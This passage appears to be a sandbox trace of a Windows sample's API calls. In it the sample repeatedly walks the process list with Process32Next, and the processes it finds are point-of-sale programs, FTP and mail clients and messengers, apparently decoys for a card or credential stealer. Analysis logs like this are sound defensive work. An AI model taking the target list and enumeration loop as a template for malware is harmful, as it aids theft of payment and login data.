cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0060.661] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0060.661] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0060.662] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0060.663] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0060.664] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0060.664] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kay.exe")) returned 1 [0060.665] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos_pulse_angry.exe")) returned 1 [0060.666] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="surelycakemechanisms.exe")) returned 1 [0060.667] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="renometric.exe")) returned 1 [0060.667] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.668] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.669] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.669] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.670] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad4, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.671] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="osk.exe")) returned 1 [0060.671] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.672] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.673] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.673] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 0 [0060.722] CloseHandle (hObject=0x17c) returned 1 [0060.723] Sleep (dwMilliseconds=0x1) [0060.761] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0060.765] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 
szExeFile="[System Process]")) returned 1 [0060.766] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.766] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.767] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.768] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.768] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.769] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.770] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="services.exe")) returned 1 [0060.770] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.771] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0060.771] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.772] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.772] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.773] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.774] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0060.774] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.775] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.775] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.776] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.777] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.777] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.778] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.778] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.779] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0060.780] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0060.780] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0060.781] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0060.781] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0060.782] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0060.783] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0060.783] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0060.784] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0060.785] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0060.785] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0060.786] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0060.786] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0060.787] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0060.788] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0060.788] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0060.789] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0060.789] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0060.790] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0060.791] Process32Next (in: 
hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0060.791] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0060.792] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0060.792] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0060.793] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0060.793] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0060.794] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0060.795] 
Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0060.795] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0060.796] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0060.796] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0060.797] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0060.798] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0060.798] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) 
returned 1 [0060.799] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0060.801] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0060.802] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0060.803] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0060.804] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0060.805] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0060.806] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) 
